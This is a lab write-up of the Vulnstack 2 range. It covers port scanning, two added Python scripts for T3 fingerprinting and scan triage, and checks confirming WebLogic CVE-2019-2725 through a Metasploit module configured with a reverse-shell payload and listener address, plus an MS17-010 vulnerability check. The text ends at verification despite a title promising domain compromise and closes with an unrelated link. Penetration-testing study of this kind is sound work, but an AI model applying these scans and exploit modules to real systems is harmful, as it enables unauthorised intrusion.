
红日靶场二 (Vulnstack 2): from WebLogic CVE-2019-2725 to domain controller compromise, the full chain

Lab information

Notes:

II. Information gathering

1. TCP port scan + service fingerprinting + OS detection

Tools: rustscan + nmap (rustscan finds the open ports quickly and hands them to nmap; everything after `--` on the command line is passed straight to nmap)

nmap is run with -Pn, which skips host discovery. The point is to stop a failed ping sweep from silently breaking the service and OS fingerprinting.

This matters because nmap's default scan logic is:

Host discovery (ICMP ping / TCP ping)
        ↓
    No response?
        ↓
Host treated as down → skipped entirely, no port scan

The problem is that many hosts (Windows boxes and firewalled servers in particular) block ICMP while their services run normally. nmap then wrongly marks the host as down and you get nothing back. -n is added for the same reason: it disables reverse DNS so the scan does not stall on lookups.

Command:

sudo rustscan -a 192.168.111.80 -r 1-65535 -- -sV -O -Pn -n

Output (truncated; only the relevant part is shown):

PORT      STATE SERVICE        REASON         VERSION
80/tcp    open  http           syn-ack ttl 63 Microsoft IIS httpd 7.5
135/tcp   open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
139/tcp   open  netbios-ssn    syn-ack ttl 63 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s       syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp  open  ms-wbt-server? syn-ack ttl 63
7001/tcp  open  http           syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
49153/tcp open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
49154/tcp open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
49176/tcp open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
49194/tcp open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
60966/tcp open  ms-sql-s       syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (94%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2008 R2 or Windows 7 SP1 (94%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 SP1 (88%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 or Windows 8.1 (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.98%E=4%D=3/31%OT=80%CT=%CU=%PV=Y%G=N%TM=69CB43AF%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=109%TI=I%TS=7)
SEQ(SP=109%GCD=1%ISR=108%TI=I%TS=7)
OPS(O1=M551NW8ST11%O2=M551NW8ST11%O3=M551NW8NNT11%O4=M551NW8ST11%O5=M551NW8ST11%O6=M551ST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%TG=40%W=2000%O=M551NW8NNS%CC=N%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=N)

Uptime guess: 0.016 days (since Tue Mar 31 11:23:47 2026)
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 181.06 seconds
           Raw packets sent: 198 (18.984KB) | Rcvd: 60 (3.064KB)

2. UDP scan of key ports + fingerprinting

Run a UDP pass as well so that nothing important is missed:

Tool: nmap

Command:

sudo nmap -sU --top-ports 20 -sV -Pn -n 192.168.111.80

Output:

Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 11:51 +0800
Nmap scan report for 192.168.111.80
Host is up.

PORT      STATE         SERVICE      VERSION
53/udp    open|filtered domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp open|filtered unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.47 seconds

Every one of the 20 ports came back open|filtered: nmap got neither a UDP reply nor an ICMP port-unreachable, which is exactly what a host firewall that silently drops UDP looks like. This round therefore adds nothing to the picture; the TCP results are what we work from.

3. Priority list

Target: most likely Windows Server 2008 R2. nmap's top OS guess is 2008 R2 at 94% and the SMB and MSSQL banners both say 2008 R2; note that the OS detection was degraded because no closed TCP port was found, so the guess is not definitive.

Architecture: almost certainly x64 (Server 2008 R2 only shipped in 64-bit editions).

Ports to focus on:

PORT      STATE SERVICE        REASON         VERSION
7001/tcp  open  http           syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)

T3 is WebLogic's proprietary RMI transport. It is enabled by default and has a long record of Java deserialization bugs (CVE-2017-3248 and CVE-2018-2628, among others). Note that the bug verified below, CVE-2019-2725, takes a different path: it is an XMLDecoder deserialization in the wls9_async / wls-wsat web service components, reached over plain HTTP on the same 7001 port. The "T3 enabled" flag in the banner only tells us the listener accepts the T3 handshake, which is worth confirming separately because it widens the attack surface.
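The handshake itself is short enough to drive by hand. The following probe is an added example and not part of the original write-up: it sends the plain-text T3 greeting that nmap's weblogic-t3-info script uses and parses the HELO reply, which carries the server version and whether the listener is the TLS (t3s) variant. The SAMPLE_REPLY bytes are constructed for the offline check and were not captured from the lab host.

```python
"""Fingerprint a WebLogic listener over T3 with the plain-text handshake.

Added example, not code from the original write-up. The greeting format
(client "t3 <ver>\\nAS:255\\nHL:19\\n\\n", server "HELO:<ver>.<ssl>\\n...") is
the one nmap's weblogic-t3-info script speaks. SAMPLE_REPLY below is a
constructed reply, not a capture from the lab host.
"""
import re
import socket

# Client side of the handshake. The version number is what we claim to speak;
# the server answers with its own version regardless.
T3_HELLO = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"

# Server side: "HELO:<server version>.<true|false>" where the boolean says
# whether the connection is the TLS-wrapped t3s variant.
_HELO_RE = re.compile(rb"^HELO:(\d+(?:\.\d+)*)\.(true|false)")


def parse_t3_reply(data: bytes):
    """Return (version, is_tls) from a T3 HELO reply.

    Returns None when the bytes are not a T3 greeting, e.g. the port is a
    plain HTTP listener or the T3 protocol has been disabled with a
    connection filter.
    """
    m = _HELO_RE.match(data)
    if not m:
        return None
    return m.group(1).decode(), m.group(2) == b"true"


def probe_t3(host: str, port: int = 7001, timeout: float = 5.0):
    """Open a TCP connection, send the greeting and parse whatever comes back."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(T3_HELLO)
        reply = s.recv(1024)
    return parse_t3_reply(reply)


# Constructed reply matching the banner seen in the scan: 10.3.6.0, T3 without TLS.
SAMPLE_REPLY = b"HELO:10.3.6.0.false\nAS:2048\nHL:19\nMS:10000000\n\n"

if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        print(probe_t3(sys.argv[1]))       # live probe against a host you own
    else:
        print(parse_t3_reply(SAMPLE_REPLY))  # offline: ('10.3.6.0', False)
```

Run it with the target IP as the only argument; a None result means the port did not answer the greeting, which is the cheap way to tell a plain HTTP listener from one that still exposes T3.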

PORT      STATE SERVICE        REASON         VERSION
445/tcp   open  microsoft-ds   syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

MS17-010 (EternalBlue): an unpatched Server 2008 R2 is vulnerable out of the box, because SMBv1 is enabled by default and the fix only arrived with the March 2017 security update.
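The priority list above is the kind of triage that is worth automating once you scan more than one host. The script below is an added example, not part of the original write-up: it parses nmap's normal-output port table (with the REASON column, as produced above) and ranks the open ports with the same reasoning as this section, WebLogic with T3 and SMB on a 2008 R2 box first, MSSQL and RDP as secondary context. The sample table is copied from the scan above; the rule set and every function name are this example's own.

```python
"""Rank nmap service-detection results into an attack priority list.

Added example, not code from the original write-up. The rules encode the
triage of the priority-list section; the sample table is the scan output
from above and is the only input the code has been run on.
"""
import re
from dataclasses import dataclass

# Rows copied from the scan above (constructed sample input for the example).
SAMPLE_NMAP = """\
PORT      STATE SERVICE        REASON         VERSION
80/tcp    open  http           syn-ack ttl 63 Microsoft IIS httpd 7.5
135/tcp   open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
445/tcp   open  microsoft-ds   syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s       syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp  open  ms-wbt-server? syn-ack ttl 63
7001/tcp  open  http           syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
"""

# One row of nmap normal output. Assumes the REASON column is present
# (nmap --reason, which is what rustscan's default nmap invocation shows);
# without it the first word of VERSION would be swallowed as the reason.
_ROW = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s+"
    r"(?P<reason>\S+(?: ttl \d+)?)\s*(?P<version>.*)$"
)


@dataclass
class Port:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_table(text: str):
    """Extract Port records from the PORT/STATE/SERVICE table; other lines are ignored."""
    ports = []
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            ports.append(Port(int(m["port"]), m["proto"], m["state"],
                              m["service"], m["version"].strip()))
    return ports


# (label, predicate, priority); lower priority number means look at it first.
# The rules mirror the write-up: WebLogic 10.3.6 with T3 exposed and SMB on a
# 2008 R2 host are the likely entry points, the rest matters after a foothold.
RULES = [
    ("WebLogic with T3 exposed (CVE-2019-2725 candidate)",
     lambda p: "WebLogic" in p.version and "T3 enabled" in p.version, 1),
    ("SMB on Windows Server 2008 R2 (MS17-010 candidate)",
     lambda p: p.service == "microsoft-ds" and "2008" in p.version, 1),
    ("MS SQL Server (secondary; needs credentials)",
     lambda p: p.service == "ms-sql-s", 2),
    ("RDP (lateral movement once credentials exist)",
     lambda p: p.port == 3389, 3),
]


def prioritise(ports):
    """Return [(priority, port, label)] for open ports that match a rule, best first."""
    hits = []
    for p in ports:
        if p.state != "open":
            continue
        for label, pred, prio in RULES:
            if pred(p):
                hits.append((prio, p.port, label))
                break  # first matching rule wins
    return sorted(hits)


if __name__ == "__main__":
    for prio, port, label in prioritise(parse_nmap_table(SAMPLE_NMAP)):
        print(f"P{prio}  {port:>5}/tcp  {label}")
```

Feed it the port table of any nmap run with `--reason`; ports without a matching rule (IIS on 80 and the RPC endpoints here) are deliberately left out of the list rather than given a low priority, so the output stays short enough to act on.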

III. Vulnerability discovery and verification

1. CVE-2019-2725

Search for vulnerabilities matching the fingerprint:

Note that more search keywords are not always better; loosening the terms often surfaces richer results.

Check the CVE ID:

zyf@kali:~$ searchsploit -x 46780 | head -10
  Exploit: Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46780
     Path: /usr/share/exploitdb/exploits/windows/webapps/46780.py
    Codes: CVE-2019-2725
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (6251)

#!/usr/bin/python
# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725

So it is CVE-2019-2725. Open MSF and use search to find the matching module:

msfconsole

msf > search CVE-2019-2725

Matching Modules
================

   #  Name                                                          Disclosure Date  Rank       Check  Description
   -  ----                                                          ---------------  ----       -----  -----------
   0  exploit/multi/misc/weblogic_deserialize_asyncresponseservice  2019-04-23       excellent  Yes    Oracle Weblogic Server Deserialization RCE - AsyncResponseService
   1    \_ target: Unix                                             .                .          .      .
   2    \_ target: Windows                                          .                .          .      .
   3    \_ target: Solaris                                          .                .          .      .

Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
After interacting with a module you can manually set a TARGET with set TARGET 'Solaris'

Load the module and run its check:

msf > use 0
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > info

       Name: Oracle Weblogic Server Deserialization RCE - AsyncResponseService
     Module: exploit/multi/misc/weblogic_deserialize_asyncresponseservice
   Platform: Unix, Windows, Solaris
       Arch: cmd, x64, x86
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-04-23

Provided by:
  Andres Rodriguez - 2Secure (@acamro) <acamro@gmail.com>

Module side effects:
  ioc-in-logs

Module stability:
  crash-safe

Module reliability:
  repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Unix
      1   Windows
      2   Solaris

Check supported:
  Yes

Basic options:
  Name       Current Setting               Required  Description
  ----       ---------------               --------  -----------
  Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sap ni, socks4
  RHOSTS                                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      7001                          yes       The target port (TCP)
  SSL        false                         no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /_async/AsyncResponseService  yes       URL to AsyncResponseService
  VHOST                                    no        HTTP server virtual host

Payload information:

Description:
  An unauthenticated attacker with network access to the Oracle Weblogic
  Server T3 interface can send a malicious SOAP request to the interface
  WLS AsyncResponseService to execute code on the vulnerable host.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-2725
  http://web.archive.org/web/20190508024326/http://www.cnvd.org.cn/webinfo/show/4999
  https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
  https://twitter.com/F5Labs/status/1120822404568244224

View the full module info with the info -d command.

msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target Windows
target => Windows
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST 192.168.111.44
LHOST => 192.168.111.44
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set RHOST 192.168.111.80
RHOST => 192.168.111.80
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
[+] 192.168.111.80:7001 - The target is vulnerable.

The vulnerability is present. Note that the default payload after `use 0` is cmd/unix/reverse_bash; since the target is Windows it must be swapped for a Windows payload before running the exploit.

2. EternalBlue

Use nmap's NSE script to verify the vulnerability:

┌──(zyf㉿kali)-[~/hongr2]
└─$ sudo nmap --script=smb-vuln-ms17-010 192.168.111.80 -p 445 -Pn -n
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 15:02 +0800
Nmap scan report for 192.168.111.80
Host is up (0.068s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 1.99 seconds

The vulnerability is present.

http://www.gsyq.cn/news/1581994.html
